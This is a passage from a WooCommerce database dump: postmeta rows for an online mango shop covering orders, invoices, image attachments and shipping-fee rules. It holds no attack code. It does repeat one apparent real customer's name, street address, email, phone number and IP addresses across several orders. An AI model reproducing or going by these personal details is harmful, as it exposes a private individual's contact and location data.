layout'),(3928,1017,'_shipping_city','bangalore'),(3929,1017,'_shipping_state','KA'),(3930,1017,'_shipping_postcode','560102'),(3931,1017,'_shipping_country','IN'),(3932,1017,'_order_currency','INR'),(3933,1017,'_cart_discount','0'),(3934,1017,'_cart_discount_tax','0'),(3935,1017,'_order_shipping','0'),(3936,1017,'_order_shipping_tax','0'),(3937,1017,'_order_tax','0'),(3938,1017,'_order_total','732.00'),(3939,1017,'_order_version','6.2.1'),(3940,1017,'_prices_include_tax','no'),(3941,1017,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3942,1017,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3943,1017,'is_vat_exempt','no'),(3944,1017,'_wc_cancel_key','99d3a7a7b88795c6f8a346be6e33787f'),(3945,1017,'_wcfmmp_order_processed','yes'),(3946,1017,'_transaction_id','pay_J0Dz3Bh0dZOdi3'),(3947,1017,'_date_paid','1645788306'),(3948,1017,'_paid_date','2022-02-25 16:55:06'),(3949,1017,'_download_permissions_granted','yes'),(3950,1017,'_recorded_sales','yes'),(3951,1017,'_recorded_coupon_usage_counts','no'),(3952,1017,'_order_stock_reduced','no'),(3953,1017,'_wcfm_new_order_notified','yes'),(3954,1017,'_wcfm_membership_order_processed','yes'),(3955,1017,'_new_order_email_sent','true'),(3956,1017,'_wcfmmp_order_email_triggered','yes'),(3958,1018,'_order_key','wc_order_Ua5FTFCqLvFat'),(3959,1018,'_customer_user','21'),(3960,1018,'_payment_method','razorpay'),(3961,1018,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3962,1018,'_customer_ip_address','116.73.72.114'),(3963,1018,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3964,1018,'_created_via','checkout'),(3965,1018,'_cart_hash','2e8a2fe0efa6f97f295cfec200f4d15d'),(3966,1018,'_billing_first_name','bavani'),(3967,1018,'_billing_last_name','p'),(3968,1018,'_billing_address_1','800 ,spandana towers'),(3969,1018,'_billing_address_2','hsr layout'),(3970,1018,'_billing_city','bangalore'),(3971,1018,'_billing_state','KA'),(3972,1018,'_billing_postcode','560102'),(3973,1018,'_billing_country','IN'),(3974,1018,'_billing_email','bhavani@utfindia.in'),(3975,1018,'_billing_phone','7412435646'),(3976,1018,'_shipping_first_name','bavani'),(3977,1018,'_shipping_last_name','p'),(3978,1018,'_shipping_address_1','800 ,spandana towers'),(3979,1018,'_shipping_address_2','hsr layout'),(3980,1018,'_shipping_city','bangalore'),(3981,1018,'_shipping_state','KA'),(3982,1018,'_shipping_postcode','560102'),(3983,1018,'_shipping_country','IN'),(3984,1018,'_order_currency','INR'),(3985,1018,'_cart_discount','0'),(3986,1018,'_cart_discount_tax','0'),(3987,1018,'_order_shipping','0'),(3988,1018,'_order_shipping_tax','0'),(3989,1018,'_order_tax','0'),(3990,1018,'_order_total','222.00'),(3991,1018,'_order_version','6.2.1'),(3992,1018,'_prices_include_tax','no'),(3993,1018,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3994,1018,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3995,1018,'is_vat_exempt','no'),(3996,1018,'_wc_cancel_key','4f45e2a3784239562b14377afd337937'),(3997,1018,'_wcfmmp_order_processed','yes'),(3998,1018,'is_magic_checkout_order','no'),(3999,1018,'_transaction_id','pay_J2UhWbr4iGkiE2'),(4000,1018,'_date_paid','1646283859'),(4001,1018,'_paid_date','2022-03-03 10:34:19'),(4002,1018,'_download_permissions_granted','yes'),(4003,1018,'_recorded_sales','yes'),(4004,1018,'_recorded_coupon_usage_counts','yes'),(4005,1018,'_order_stock_reduced','yes'),(4006,1018,'_wcfm_new_order_notified','yes'),(4007,1018,'_wcfm_membership_order_processed','yes'),(4008,1018,'_new_order_email_sent','true'),(4009,1018,'_wcfmmp_order_email_triggered','yes'),(4010,1018,'_date_completed','1646283922'),(4011,1018,'_completed_date','2022-03-03 10:35:22'),(4012,1017,'_wc_cancel_additional_txt','no need'),(4013,1019,'_wp_attached_file','2022/03/WhatsApp-Image-2022-03-02-at-4.24.39-PM.jpeg'),(4014,1019,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1272;s:6:\"height\";i:1280;s:4:\"file\";s:52:\"2022/03/WhatsApp-Image-2022-03-02-at-4.24.39-PM.jpeg\";s:8:\"filesize\";i:123427;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18266;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3271;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-50x50.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1258;}s:6:\"medium\";a:4:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-298x300.jpeg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:54:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-1018x1024.jpeg\";s:5:\"width\";i:1018;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-768x773.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:773;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-600x604.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:604;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:52:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:50:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:50:\"WhatsApp-Image-2022-03-02-at-4.24.39-PM-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4068,1022,'_order_key','wc_order_8JrCFu9UQyN47'),(4069,1022,'_customer_user','21'),(4070,1022,'_payment_method','razorpay'),(4071,1022,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(4072,1022,'_customer_ip_address','223.226.34.15'),(4073,1022,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(4074,1022,'_created_via','checkout'),(4075,1022,'_cart_hash','f6f4904f465c6e2ed42b3266a0908986'),(4076,1022,'_billing_first_name','bavani'),(4077,1022,'_billing_last_name','p'),(4078,1022,'_billing_address_1','800 ,spandana towers'),(4079,1022,'_billing_address_2','hsr layout'),(4080,1022,'_billing_city','bangalore'),(4081,1022,'_billing_state','KA'),(4082,1022,'_billing_postcode','560102'),(4083,1022,'_billing_country','IN'),(4084,1022,'_billing_email','bhavani@utfindia.in'),(4085,1022,'_billing_phone','7412435646'),(4086,1022,'_shipping_first_name','bavani'),(4087,1022,'_shipping_last_name','p'),(4088,1022,'_shipping_address_1','800 ,spandana towers'),(4089,1022,'_shipping_address_2','hsr layout'),(4090,1022,'_shipping_city','bangalore'),(4091,1022,'_shipping_state','KA'),(4092,1022,'_shipping_postcode','560102'),(4093,1022,'_shipping_country','IN'),(4094,1022,'_order_currency','INR'),(4095,1022,'_cart_discount','0'),(4096,1022,'_cart_discount_tax','0'),(4097,1022,'_order_shipping','25'),(4098,1022,'_order_shipping_tax','0'),(4099,1022,'_order_tax','0'),(4100,1022,'_order_total','328.00'),(4101,1022,'_order_version','6.2.1'),(4102,1022,'_prices_include_tax','no'),(4103,1022,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(4104,1022,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(4105,1022,'is_vat_exempt','no'),(4106,1022,'_wc_cancel_key','ff9416369f1c3dbc87b5b6cc548a5bec'),(4107,1022,'_wcfmmp_order_processed','yes'),(4108,1022,'is_magic_checkout_order','no'),(4109,1022,'_transaction_id','pay_J2V5FGTcUOL5NJ'),(4110,1022,'_date_paid','1646285206'),(4111,1022,'_paid_date','2022-03-03 10:56:46'),(4112,1022,'_download_permissions_granted','yes'),(4113,1022,'_recorded_sales','yes'),(4114,1022,'_recorded_coupon_usage_counts','yes'),(4115,1022,'_order_stock_reduced','yes'),(4116,1022,'_wcfm_new_order_notified','yes'),(4117,1022,'_wcfm_membership_order_processed','yes'),(4118,1022,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(4119,1022,'_wcpdf_invoice_date','1646285206'),(4120,1022,'_wcpdf_invoice_date_formatted','2022-03-03 10:56:46'),(4121,1022,'_wcpdf_invoice_number','1'),(4122,1022,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:1;s:16:\"formatted_number\";s:1:\"1\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1022;s:7:\"padding\";N;}'),(4123,1022,'_new_order_email_sent','true'),(4124,1022,'_wcfmmp_order_email_triggered','yes'),(4125,1022,'_date_completed','1646285318'),(4126,1022,'_completed_date','2022-03-03 10:58:38'),(4127,1023,'_order_key','wc_order_mt1WJQxGBybQX'),(4128,1023,'_customer_user','21'),(4129,1023,'_payment_method','razorpay'),(4130,1023,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(4131,1023,'_customer_ip_address','223.226.34.15'),(4132,1023,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(4133,1023,'_created_via','checkout'),(4134,1023,'_cart_hash','ff3974e98b2ada6ac2c524c3b55c3055'),(4135,1023,'_billing_first_name','bavani'),(4136,1023,'_billing_last_name','p'),(4137,1023,'_billing_address_1','800 ,spandana towers'),(4138,1023,'_billing_address_2','hsr layout'),(4139,1023,'_billing_city','bangalore'),(4140,1023,'_billing_state','KA'),(4141,1023,'_billing_postcode','560102'),(4142,1023,'_billing_country','IN'),(4143,1023,'_billing_email','bhavani@utfindia.in'),(4144,1023,'_billing_phone','7412435646'),(4145,1023,'_shipping_first_name','bavani'),(4146,1023,'_shipping_last_name','p'),(4147,1023,'_shipping_address_1','800 ,spandana towers'),(4148,1023,'_shipping_address_2','hsr layout'),(4149,1023,'_shipping_city','bangalore'),(4150,1023,'_shipping_state','KA'),(4151,1023,'_shipping_postcode','560102'),(4152,1023,'_shipping_country','IN'),(4153,1023,'_order_currency','INR'),(4154,1023,'_cart_discount','0'),(4155,1023,'_cart_discount_tax','0'),(4156,1023,'_order_shipping','50'),(4157,1023,'_order_shipping_tax','0'),(4158,1023,'_order_tax','0'),(4159,1023,'_order_total','253.00'),(4160,1023,'_order_version','6.2.1'),(4161,1023,'_prices_include_tax','no'),(4162,1023,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(4163,1023,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(4164,1023,'is_vat_exempt','no'),(4165,1023,'_wc_cancel_key','3775231d4f5fd63f76a7b0236cbaedcc'),(4166,1023,'_wcfmmp_order_processed','yes'),(4167,1023,'is_magic_checkout_order','no'),(4168,1023,'_transaction_id','pay_J2VBfYnIzBcRqk'),(4169,1023,'_date_paid','1646285571'),(4170,1023,'_paid_date','2022-03-03 11:02:51'),(4171,1023,'_download_permissions_granted','yes'),(4172,1023,'_recorded_sales','yes'),(4173,1023,'_recorded_coupon_usage_counts','yes'),(4174,1023,'_order_stock_reduced','yes'),(4175,1023,'_wcfm_new_order_notified','yes'),(4176,1023,'_wcfm_membership_order_processed','yes'),(4177,1023,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(4178,1023,'_wcpdf_invoice_date','1646285572'),(4179,1023,'_wcpdf_invoice_date_formatted','2022-03-03 11:02:52'),(4180,1023,'_wcpdf_invoice_number','2'),(4181,1023,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:2;s:16:\"formatted_number\";s:1:\"2\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1023;s:7:\"padding\";N;}'),(4182,1023,'_new_order_email_sent','true'),(4183,1023,'_wcfmmp_order_email_triggered','yes'),(4184,1023,'_wc_cancel_additional_txt','fgdfg'),(4185,1024,'pi_status','on'),(4186,1024,'pi_cost','20'),(4187,1024,'pi_desc',''),(4188,1024,'pi_is_taxable','no'),(4189,1024,'pi_extra_cost_calc_type','class'),(4190,1024,'pi_condition_logic','and'),(4191,1024,'pi_metabox','a:1:{i:0;a:3:{s:12:\"pi_condition\";s:29:\"cart_subtotal_before_discount\";s:8:\"pi_logic\";s:13:\"less_equal_to\";s:8:\"pi_value\";a:1:{i:0;s:3:\"200\";}}}'),(4192,1024,'pi_enable_additional_charges','on'),(4193,1024,'pi_enable_additional_charges_cart_quantity','off'),(4194,1024,'pi_cart_quantity_charges','a:0:{}'),(4195,1024,'pi_efrs_cart_quantity_sum_of_charges','all'),(4196,1024,'pi_enable_additional_charges_cart_weight','off'),(4197,1024,'pi_cart_weight_charges','a:0:{}'),(4198,1024,'pi_efrs_cart_weight_sum_of_charges','all'),(4199,1024,'pi_enable_additional_charges_cart_subtotal','off'),(4200,1024,'pi_cart_subtotal_charges','a:0:{}'),(4201,1024,'pi_efrs_cart_subtotal_sum_of_charges','all'),(4202,1025,'pi_status','on'),(4203,1025,'pi_cost','10'),(4204,1025,'pi_desc',''),(4205,1025,'pi_is_taxable','no'),(4206,1025,'pi_extra_cost_calc_type','class'),(4207,1025,'pi_condition_logic','and'),(4208,1025,'pi_metabox','a:1:{i:0;a:3:{s:12:\"pi_condition\";s:29:\"cart_subtotal_before_discount\";s:8:\"pi_logic\";s:16:\"greater_equal_to\";s:8:\"pi_value\";a:1:{i:0;s:3:\"400\";}}}'),(4209,1025,'pi_enable_additional_charges','off'),(4210,1025,'pi_enable_additional_charges_cart_quantity','off'),(4211,1025,'pi_cart_quantity_charges','a:0:{}'),(4212,1025,'pi_efrs_cart_quantity_sum_of_charges','all'),(4213,1025,'pi_enable_additional_charges_cart_weight','off'),(4214,1025,'pi_cart_weight_charges','a:0:{}'),(4215,1025,'pi_efrs_cart_weight_sum_of_charges','all'),(4216,1025,'pi_enable_additional_charges_cart_subtotal','off'),(4217,1025,'pi_cart_subtotal_charges','a:0:{}'),(4218,1025,'pi_efrs_cart_subtotal_sum_of_charges','all'),(4219,1026,'location_type','country'),(4220,1026,'zone_type','countries'),(4221,1026,'location_code','a:1:{i:0;a:1:{i:0;s:2:\"IN\";}}'),(4222,1027,'sm_product_cost','20'),(4223,1027,'is_allow_free_shipping','on'),(4224,1027,'sm_free_shipping_based_on','min_order_amt'),(4225,1027,'sm_free_shipping_cost','500'),(4226,1027,'sm_free_shipping_coupan_cost',''),(4227,1027,'sm_free_shipping_label','Free Shipping'),(4228,1027,'sm_tooltip_type','tooltip'),(4229,1027,'sm_tooltip_desc',''),(4230,1027,'sm_select_log_in_user','no'),(4231,1027,'sm_select_selected_shipping','no'),(4232,1027,'sm_select_taxable','no'),(4233,1027,'sm_select_shipping_provider',''),(4234,1027,'sm_metabox','a:1:{i:0;a:3:{s:33:\"product_fees_conditions_condition\";s:7:\"country\";s:26:\"product_fees_conditions_is\";s:11:\"is_equal_to\";s:30:\"product_fees_conditions_values\";a:0:{}}}'),(4235,1027,'sm_extra_cost','a:0:{}'),(4236,1027,'sm_extra_cost_calculation_type',''),(4237,1027,'cost_on_total_cart_weight_status','off'),(4238,1027,'cost_on_total_cart_subtotal_status','on'),(4239,1027,'sm_metabox_ap_total_cart_weight','a:0:{}'),(4240,1027,'sm_metabox_ap_total_cart_subtotal','a:1:{i:0;a:4:{s:27:\"ap_fees_total_cart_subtotal\";a:1:{i:0;s:0:\"\";}s:43:\"ap_fees_ap_total_cart_subtotal_min_subtotal\";s:1:\"1\";s:43:\"ap_fees_ap_total_cart_subtotal_max_subtotal\";s:3:\"100\";s:36:\"ap_fees_ap_price_total_cart_subtotal\";s:2:\"30\";}}'),(4241,1027,'ap_rule_status','on'),(4242,1028,'sm_product_cost','10'),(4243,1028,'is_allow_free_shipping',''),(4244,1028,'sm_free_shipping_based_on','min_order_amt'),(4245,1028,'sm_free_shipping_cost',''),(4246,1028,'sm_free_shipping_coupan_cost',''),(4247,1028,'sm_free_shipping_label','Free Shipping'),(4248,1028,'sm_tooltip_type','tooltip'),(4249,1028,'sm_tooltip_desc',''),(4250,1028,'sm_select_log_in_user','no'),(4251,1028,'sm_select_selected_shipping','no'),(4252,1028,'sm_select_taxable','no'),(4253,1028,'sm_select_shipping_provider',''),(4254,1028,'sm_metabox','a:1:{i:0;a:3:{s:33:\"product_fees_conditions_condition\";s:7:\"country\";s:26:\"product_fees_conditions_is\";s:11:\"is_equal_to\";s:30:\"product_fees_conditions_values\";a:0:{}}}'),(4255,1028,'sm_extra_cost','a:0:{}'),(4256,1028,'sm_extra_cost_calculation_type',''),(4257,1028,'cost_on_total_cart_weight_status','off'),(4258,1028,'cost_on_total_cart_subtotal_status','on'),(4259,1028,'sm_metabox_ap_total_cart_weight','a:0:{}'),(4260,1028,'sm_metabox_ap_total_cart_subtotal','a:1:{i:0;a:4:{s:27:\"ap_fees_total_cart_subtotal\";a:1:{i:0;s:0:\"\";}s:43:\"ap_fees_ap_total_cart_subtotal_min_subtotal\";s:3:\"101\";s:43:\"ap_fees_ap_total_cart_subtotal_max_subtotal\";s:3:\"200\";s:36:\"ap_fees_ap_price_total_cart_subtotal\";s:2:\"10\";}}'),(4261,1028,'ap_rule_status','on'),(4285,1031,'_wp_attached_file','2022/03/Screenshot-26-e1646300007323.png'),(4286,1031,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:843;s:6:\"height\";i:367;s:4:\"file\";s:40:\"2022/03/Screenshot-26-e1646300007323.png\";s:8:\"filesize\";i:382724;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:143341;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17319;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:38:\"Screenshot-26-e1646300007323-50x22.png\";s:5:\"width\";i:50;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2458;}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-768x334.png\";s:5:\"width\";i:768;s:6:\"height\";i:334;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-600x261.png\";s:5:\"width\";i:600;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"Screenshot-26-e1646300007323-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:38:\"Screenshot-26-e1646300007323-48x21.png\";s:5:\"width\";i:48;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:38:\"Screenshot-26-e1646300007323-48x21.png\";s:5:\"width\";i:48;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4288,1031,'_wp_attachment_backup_sizes','a:13:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:850;s:6:\"height\";i:368;s:4:\"file\";s:17:\"Screenshot-26.png\";}s:18:\"full-1646300007323\";a:3:{s:5:\"width\";i:850;s:6:\"height\";i:368;s:4:\"file\";s:32:\"Screenshot-26-e1646299994139.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-300x130.png\";s:5:\"width\";i:300;s:6:\"height\";i:130;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-768x332.png\";s:5:\"width\";i:768;s:6:\"height\";i:332;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:25:\"Screenshot-26-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-600x260.png\";s:5:\"width\";i:600;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-600x260.png\";s:5:\"width\";i:600;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:25:\"Screenshot-26-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:23:\"Screenshot-26-48x21.png\";s:5:\"width\";i:48;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:23:\"Screenshot-26-48x21.png\";s:5:\"width\";i:48;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";}}'),(4289,1033,'_wp_attached_file','2022/03/mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842.jpg'),(4290,1033,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:533;s:4:\"file\";s:132:\"2022/03/mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842.jpg\";s:8:\"filesize\";i:55773;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15067;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5657;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:130:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-50x17.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:17;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4135;}s:6:\"medium\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:133:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:132:\"mango-beautiful-female-hands-green-background-banner-long-format-mango-beautiful-female-hands-green-background-122867842-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a